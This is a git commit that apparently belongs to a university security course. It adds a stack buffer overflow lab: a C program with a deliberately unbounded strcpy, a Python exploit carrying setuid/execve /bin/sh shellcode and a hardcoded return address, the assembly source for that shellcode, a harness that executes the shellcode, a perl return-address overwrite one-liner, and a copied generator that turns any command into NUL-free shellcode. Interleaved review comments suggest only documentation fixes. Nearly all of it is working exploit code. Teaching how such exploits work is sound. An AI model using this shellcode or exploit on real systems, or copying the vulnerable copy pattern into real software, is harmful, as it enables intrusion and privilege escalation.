authorGuillermo Ramos2013-05-27 00:07:01 +0200
committerGuillermo Ramos2013-05-27 00:07:01 +0200
commit45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 (patch)
tree1f9b534ed4ea650517c39799f5e2aed0885ce87d /c_seguridad/code/bof
Diffstat (limited to 'c_seguridad/code/bof')
-rw-r--r--c_seguridad/code/bof/.chuleta.txt1
-rw-r--r--c_seguridad/code/bof/exit.asm8
-rwxr-xr-xc_seguridad/code/bof/exploit.py23
-rw-r--r--c_seguridad/code/bof/exploitable.c14
-rw-r--r--c_seguridad/code/bof/shellcode1
-rwxr-xr-xc_seguridad/code/bof/shellcodeGen/shellcodeGen.c73
-rw-r--r--c_seguridad/code/bof/shellex.asm25
-rw-r--r--c_seguridad/code/bof/test.c15
8 files changed, 160 insertions, 0 deletions
diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ mov bl, 123
+ int 0x80
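Review bot: exit.asm has no comment saying what its eight instructions do, so a reader has to decode the register setup by hand; a one-line header would do, e.g. `; exit(123) through the 32-bit Linux int 0x80 ABI: eax=1 (sys_exit), ebx=123 (exit status)`. The same applies to shellex.asm later in this commit, which is longer and also uncommented. The `xor eax, eax` / `mov al, 1` pair instead of a plain `mov eax, 1` is deliberate and worth a comment too, since the commit's other files (shellcodeGen.c header) explain the NUL-free requirement only in passing.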
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+ # Buffer offset
+ "\x90"*17 +
+
+ # Shellcode (55 chars)
+ "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+ "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+ "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+ "\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+ "\xf8\xf7\xff\xbf"
+ )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
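Review bot: `cmd = "./exploitable " + shellcode` is built and never used, and `sleep` and `system` are imported and never called; the script's only effect is `print shellcode`. Either delete `cmd` and the two imports, or add a comment saying the command string is kept on purpose, because as written it reads like an unfinished `system(cmd)` call that a later edit might enable by accident. The three segments of `shellcode` would also read better if the trailing `"\xf8\xf7\xff\xbf"` carried a comment like the `# Buffer offset` and `# Shellcode (55 chars)` lines above it, so the `17 + 55 + 4` layout is visible without counting.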
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+ printf("Entrando en vulnerable...\n");
+ char arr[60];
+ strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+ if (argc > 1)
+ vulnerable(*(argv+1));
+ return 0;
+}
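Review bot: nothing in exploitable.c marks the unbounded `strcpy(arr, str)` into the 60-byte `arr` as the intentional defect of this lab, so the file can be mistaken for ordinary code; a comment above the call such as `/* Deliberately unbounded copy: this is the lab's overflow target. Real code must bound the copy, e.g. snprintf(arr, sizeof arr, "%s", str). */` states both the intent and the fix. The argument is passed as `*(argv+1)` where `argv[1]` is the conventional form. `char** argv` here and `char **argv` in shellcodeGen.c in the same commit use different declarator styles; pick one.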
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+1F11̀1[C[C KS ̀/bin/shNAAAABBBB
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**
+ *
+ * BlackLight's shellcode generator for Linux x86
+ * Tested anywhere, working & NULL-free
+ *
+ * Usage: ./generator <cmd>
+ * ...and then you've got a ready2inject NULL-free shellcode for the command you like
+ *
+ * copyleft 2008 by BlackLight <blacklight[at]autistici.org>
+ * < http://blacklight.gotdns.org >
+ *
+ * Released under GPL v.3 licence
+ *
+ * Greetz to: evilsocket, for the idea he gave me ;)
+ * Greetz to: my friends, who tested, used and appreciated this code and helped
+ * me to improve it to what it is now
+ * Greetz to: my girl, next to me in any moment even if she had no idea
+ * about what I was doing ^^
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char code[] =
+ "\\x60" /*pusha*/
+ "\\x31\\xc0" /*xor %eax,%eax*/
+ "\\x31\\xd2" /*xor %edx,%edx*/
+ "\\xb0\\x0b" /*mov $0xb,%al*/
+ "\\x52" /*push %edx*/
+ "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/
+ "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/
+ "\\x89\\xe3" /*mov %esp,%ebx*/
+ "\\x52" /*push %edx*/
+ "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/
+ "\\x89\\xe1" /*mov %esp,%ecx*/
+ "\\x52" /*push %edx*/
+ "\\xeb\\x07" /*jmp 804839a <cmd>*/
+ "\\x51" /*push %ecx*/
+ "\\x53" /*push %ebx*/
+ "\\x89\\xe1" /*mov %esp,%ecx*/
+ "\\xcd\\x80" /*int $0x80*/
+ "\\x61" /*popa*/
+ "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 <l1>*/;
+
+int main (int argc, char **argv) {
+ int i,len=0;
+ char *shell,*cmd;
+
+ if (!argv[1])
+ exit(1);
+
+ for (i=1; i<argc; i++)
+ len += strlen(argv[i]);
+ len += argc;
+
+ cmd = (char*) malloc(len);
+
+ for (i=1; i<argc; i++) {
+ strcat (cmd,argv[i]);
+ strcat (cmd,"\x20");
+ }
+
+ cmd[strlen(cmd)-1]=0;
+ shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
+ memcpy (shell,code,sizeof(code));
+
+ for (i=0; i<strlen(cmd); i++)
+ sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
+ printf ("%s\n",shell);
+}
+
+// milw0rm.com [2008-08-19] \ No newline at end of file
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+ xor eax, eax
+ mov al, 70
+ xor ebx, ebx
+ xor ecx, ecx
+ int 0x80
+
+ jmp short ender
+
+starter:
+ xor eax, eax
+ pop ebx
+ mov [ebx+7], al
+ mov [ebx+8], ebx
+ mov [ebx+12], eax
+ mov al, 11
+ lea ecx, [ebx+8]
+ lea edx, [ebx+12]
+ int 0x80
+
+ender:
+ call starter
+ db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+ int (*func)();
+ func = (int (*)()) shellcode;
+ (*func)();
+}
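Review bot: `main()` in test.c is declared without `void` and without a `return`, and converts an object pointer (`shellcode`) to a function pointer, which ISO C leaves undefined; this is the usual lab harness, but the file should say so: `/* Lab harness only: runs the bytes in shellcode[] in place; relies on a platform extension for the object-to-function-pointer cast. */`, plus `int main(void)` and `return 0;`. Presumably it also depends on the data segment being executable, since `shellcode[]` is ordinary writable data — worth stating so a failure on a hardened system is understood rather than debugged. The commented-out second `shellcode[]` is dead code; its bytes are the exit(123) sequence from exit.asm in this commit, so either say that in the comment or remove it.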